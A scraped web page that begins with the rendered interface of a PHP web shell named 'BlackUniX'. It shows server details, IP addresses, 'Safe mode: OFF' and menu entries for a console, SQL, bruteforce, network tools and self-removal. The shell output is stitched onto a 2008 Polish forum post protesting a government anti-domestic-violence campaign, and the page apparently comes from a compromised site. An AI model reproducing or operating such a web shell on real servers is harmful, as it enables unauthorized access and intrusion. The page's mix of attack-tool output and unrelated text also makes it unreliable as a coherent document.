Lobbing
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-21 08:03:02
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.80.7.173
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Protest Forum dotyczący kampanii przeciwko przemocy
Lobbing
07.08.2008.
W związku z kampanią społeczną „Przełam przemoc” pragniemy wyrazić swój głęboki sprzeciw wobec stylu i metod jakimi jest ona realizowana. Chcemy zaprotestować przeciwko stereotypowemu i krzywdzącemu większość mężczyzn przedstawianiu ich jako sprawców przemocy domowej. Taki przekaz widnieje na plakatach rządowej kampanii, na których obok napisu „przemoc domowa to przestępstwo” pokazano wizerunek mężczyzny z zaciśniętą pięścią i z pasem w drugiej ręce.
Czytaj całość…